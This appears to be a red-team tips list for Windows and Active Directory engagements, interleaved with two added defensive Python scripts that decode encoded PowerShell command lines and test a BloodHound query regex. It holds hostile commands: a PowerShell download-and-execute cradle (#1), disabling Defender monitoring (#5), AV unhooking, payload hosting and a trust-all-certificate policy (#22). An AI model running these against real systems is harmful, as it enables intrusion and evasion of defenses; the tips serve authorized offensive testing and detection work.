#0 Need good blog posts/references? Consider ired.team, ijustwannared.team, XPN's Blog, https://offensivedefence.co.uk/ and Vincent Yiu's Red Team Tips.
#1 The standard PowerShell download cradle (IEX (New-Object Net.WebClient)...) is NOT proxy aware. A far superior alternative is the following one-liner, which sends the current user's default credentials to the system proxy:
$webclient=(New-Object Net.WebClient);$webclient.Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;IEX $webclient.DownloadString("")
#2 Feeling like you hit a dead end in your enumeration? Consider SQL servers. They are often overlooked and can easily be exploited for RCE (think potato exploits). NetSPI are experts in DB exploitation: https://github.com/NetSPI. I highly recommend PowerUpSQL if you can manage to load PowerShell undetected.
#3 The command to list AV products (the SecurityCenter2 namespace only exists on client editions of Windows, not on Windows Server) is:
PowerShell:
Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntiVirusProduct
WMIC:
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
#4 Only got a CIFS TGS? You can still use sc to enable/disable/register new services on remote computers.
#5 The command to disable real-time monitoring is Set-MpPreference -DisableRealtimeMonitoring $true
This is NOT opsec safe (duh).
#6 Unhook ntdll.dll and all your AV problems go away 🙂 A good starting point is https://ired.team/offensive-security/defense-evasion/how-to-unhook-a-dll-using-c++
#7 In my honest opinion, https://github.com/skelsec/pypykatz is superior to mimikatz itself for reading out dumps and registry keys. It's Python based, so it works cross-OS. Pretty damn sweet.
#8 Don't use SimpleHTTPServer anymore; use the much better updog instead (it has upload functionality!): https://github.com/sc0tfree/updog
#9 pwndrop is another nice alternative for quickly hosting payloads, and it has facade options to keep snooping eyes away: https://github.com/kgretzky/pwndrop
#10 Need a PowerShell web server for some reason? Use this one: https://gallery.technet.microsoft.com/scriptcenter/Powershell-Webserver-74dcf466
It has script execution, command execution and download functionality.
#11 You need quote escapes in PowerShell? There are a few options: either use a backslash (\) to escape the quotes or use encoded commands instead. Pro tip: PowerShell commands can be chained, even in encoded form, by using ";" as the separator, e.g. whoami;whoami /priv
#12 Ever in a restricted environment, or using a tool that needs an argument to spawn a new shell? Use .bat or .cmd files like so (a batch comment is REM on its own line; anything after powershell.exe on the same line is passed to PowerShell as an argument):
@echo off
REM Replace the line below with any other PowerShell command you need.
powershell.exe -noexit
#13 PowerShell script to C#? No problem: https://github.com/gtworek/PSBits/blob/master/Misc/No-PowerShell.cs
#14 Need to get rid of AppLocker (after you bypassed it initially)? https://github.com/api0cradle/AppLocker-Stuff
#15 Using Costura to package your C#? @cobbr says: "Be sure to install Costura v1.6.2 to work with .NET Framework v3.5 assemblies"
#16 @0gtweet tweeted an interesting thing: "an undocumented -encodedarguments PowerShell parameter. It may be shortened to 'ea' or 'encodeda'."
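From the defender's side, the encoded command from tip #11 and the -encodedarguments switch from tip #16 both end up as base64 UTF-16LE blobs on a process command line, which is where detection and triage picks them up. The script below is an added example (not from the original post and not any tool's code): it pulls every -e.../-ea... parameter out of constructed command lines, classifies the prefix the way PowerShell's prefix matching does, and decodes it; the sample command lines and the function names are this example's own.

```python
"""Decode PowerShell -EncodedCommand / -EncodedArguments values found in
process command lines (for example the CommandLine field of Security 4688
or Sysmon Event ID 1). Added, self-contained example; every command line
below is constructed for the demo, and the function names are this
example's own."""
import base64
import re
from typing import List, Optional, Tuple

# PowerShell accepts any unambiguous prefix of a parameter name, so the
# encoded command shows up as -e, -ec, -enc, -EncodedCommand, ... and the
# undocumented encoded arguments (tip #16) as -ea, -encodeda, -EncodedArguments.
# Capture every "-e<letters> <base64>" pair and classify the name afterwards.
_PARAM_RE = re.compile(r"(?<![\w-])[-/](e[a-z]*)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def classify_param(name: str) -> Optional[str]:
    """Map an -e... parameter name to 'command', 'arguments' or None."""
    n = name.lower()
    if n == "ea" or (len(n) >= len("encodeda") and "encodedarguments".startswith(n)):
        return "arguments"
    if n == "ec" or "encodedcommand".startswith(n):  # -e, -enc, ... -encodedcommand
        return "command"
    return None  # e.g. -ExecutionPolicy


def decode_powershell_b64(value: str) -> Optional[str]:
    """Base64 -> UTF-16LE text, or None when the value is not well formed."""
    try:
        return base64.b64decode(value, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
        return None


def extract_encoded(cmdline: str) -> List[Tuple[str, str]]:
    """Return (kind, decoded_text) for every encoded parameter on one command line."""
    found: List[Tuple[str, str]] = []
    for param, b64 in _PARAM_RE.findall(cmdline):
        kind = classify_param(param)
        if kind is None:
            continue
        text = decode_powershell_b64(b64)
        found.append((kind, text if text is not None else "<invalid base64/UTF-16LE>"))
    return found


def scan(lines: List[str]) -> List[Tuple[int, str, str]]:
    """Scan many command lines; return (line_index, kind, decoded_text) hits."""
    return [(i, kind, text) for i, line in enumerate(lines) for kind, text in extract_encoded(line)]


# "whoami;whoami /priv" (the chained command from tip #11), UTF-16LE + base64.
ENCODED_WHOAMI = "dwBoAG8AYQBtAGkAOwB3AGgAbwBhAG0AaQAgAC8AcAByAGkAdgA="

# Constructed sample command lines, not real log data.
SAMPLE_COMMAND_LINES = [
    r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\inventory.ps1",
    f"powershell.exe -nop -w hidden -enc {ENCODED_WHOAMI}",
    f"powershell.exe -EncodedCommand {ENCODED_WHOAMI} -ea {ENCODED_WHOAMI}",
    "powershell.exe -e dwBo!!not-base64",   # damaged value must not crash the scan
]

if __name__ == "__main__":
    for idx, kind, text in scan(SAMPLE_COMMAND_LINES):
        print(f"line {idx}: encoded {kind}: {text!r}")
```

Two details matter in practice: -ExecutionPolicy also starts with "e", so the classifier must reject anything that is not a prefix of the two real parameter names, and a truncated or mangled value (a log field cut at a fixed width, for instance) has to decode to a marker rather than raise, or the scan stops at the first bad line.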
#17 @mpgn_x64 said: "Struggling with golden ticket and access denied? Use the 'klist add_bind' command after injecting your ticket with mimikatz or Rubeus." (tweet)
#18 Ever needed to know which registry key is being edited by MDM or GPO? Check this site: https://getadmx.com/?Category=Windows_10_2016
#19 You'll need local admin rights to change registry keys in HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\
#20 You can pass cmd args from an Explorer window, for example:

#21 When using GadgetToJScript, use x86 payloads! Also, specifying the assembly is easier than compiling the C# as it imports the correct DLLs automagically.
#22 PowerShell version 2 but having annoying SSL errors? Force TLS 1.2 by its numeric value (3072, since the Tls12 enum name is missing on the old framework) and install a certificate policy that accepts every server certificate (this disables certificate validation for the session, so only do it where that is what you want):
# TLS 1.2 = 3072 in System.Net.SecurityProtocolType
[Net.ServicePointManager]::SecurityProtocol = [Enum]::ToObject([Net.SecurityProtocolType], 3072)
# Certificate policy that accepts any certificate, regardless of the validation result
Add-Type @"
using System.Net;
using System.Security.Cryptography.X509Certificates;
public class TrustAllCertsPolicy : ICertificatePolicy {
    public bool CheckValidationResult(
        ServicePoint srvPoint, X509Certificate certificate,
        WebRequest request, int certificateProblem) {
        return true;
    }
}
"@
[System.Net.ServicePointManager]::CertificatePolicy = New-Object TrustAllCertsPolicy
#23 Want to enumerate RDP sessions? Use the qwinsta command.
#24 Want a nice overview of outdated operating systems when you have a BloodHound dump? Use the neo4j web application and run this query:
MATCH (H:Computer) WHERE H.operatingsystem =~ '(?i).*indows.*(2000|2003|2008|7|xp|vista|me).*' AND H.enabled = true RETURN H.name,H.operatingsystem
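Before acting on the query's output it is worth knowing what the regex actually matches, since the unanchored alternatives "7" and "me" are substrings of other names. The script below is an added example (not from the original post): it runs the pattern exactly as written against constructed operatingsystem values using Python's re module (Cypher's =~ is a full-string match in Java's regex dialect, which accepts these same patterns) and compares it with a word-bounded variant; the sample values and function names are this example's own.

```python
"""Check the BloodHound/Cypher 'outdated Windows' regex from tip #24 against
constructed operatingsystem values. Added example, not part of the original
post; Python's re module is used to exercise the patterns, which are plain
enough to be valid Java regexes as well, so they can be dropped into the
Cypher query unchanged. Function names are this example's own."""
import re
from typing import List

# Pattern exactly as used in the Cypher query (=~ requires a full-string match).
LOOSE = re.compile(r"(?i).*indows.*(2000|2003|2008|7|xp|vista|me).*")

# Word-bounded variant: "7" must be a whole token (not a digit inside a
# build number) and "me" must stand alone (not the tail of "Home").
STRICT = re.compile(r"(?i)windows.*\b(2000|2003|2008|7|xp|vista|me)\b")

# Constructed sample values in the form BloodHound stores them.
SAMPLE_OS: List[str] = [
    "Windows 7 Professional",
    "Windows XP Professional",
    "Windows Server 2008 R2 Standard",
    "Windows 10 Home",                     # modern, but "Home" ends in "me"
    "Windows 10 Enterprise",
    "Windows Server 2016 Standard",
    "Windows Server 2012 R2 Datacenter",   # also end-of-life, but not in the query's list
]


def loose_matches(os_names: List[str]) -> List[str]:
    """Names the original query would report (full-string match, like =~)."""
    return [n for n in os_names if LOOSE.fullmatch(n)]


def strict_matches(os_names: List[str]) -> List[str]:
    """Names the word-bounded pattern reports."""
    return [n for n in os_names if STRICT.search(n)]


def false_positives(os_names: List[str]) -> List[str]:
    """Names the original pattern flags that the word-bounded one does not."""
    strict = set(strict_matches(os_names))
    return [n for n in loose_matches(os_names) if n not in strict]


if __name__ == "__main__":
    print("original query:", loose_matches(SAMPLE_OS))
    print("word-bounded:  ", strict_matches(SAMPLE_OS))
    print("false positives:", false_positives(SAMPLE_OS))
```

Two caveats follow from this: "Windows 10 Home" is reported by the original pattern purely because of "me", and Server 2012/2012 R2 hosts never appear because 2012 is not in the alternation. A computer node whose operatingsystem property is missing also drops out silently, since a comparison against null evaluates to null and is filtered by WHERE.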
#25 When configuring a DNS beacon, do not point the NS record at the IP: create an A record first, point the A record at the IP, then point the NS record at the A record's hostname.
#26 If you install another AV on a machine that has MDE installed, Defender will turn itself off, but the health status will remain Active. ¯\_(ツ)_/¯ Could be interesting in a red team edge case, I guess. https://docs.microsoft.com/en-us/windows-hardware/customize/desktop/unattend/security-malware-windows-defender-disableantispyware… (tip provided by @0xThiebaut)
#27 Want to know which logon types generate credentials that can be reused on the target (to avoid the double hop)? https://docs.microsoft.com/en-us/windows-server/identity/securing-privileged-access/reference-tools-logon-types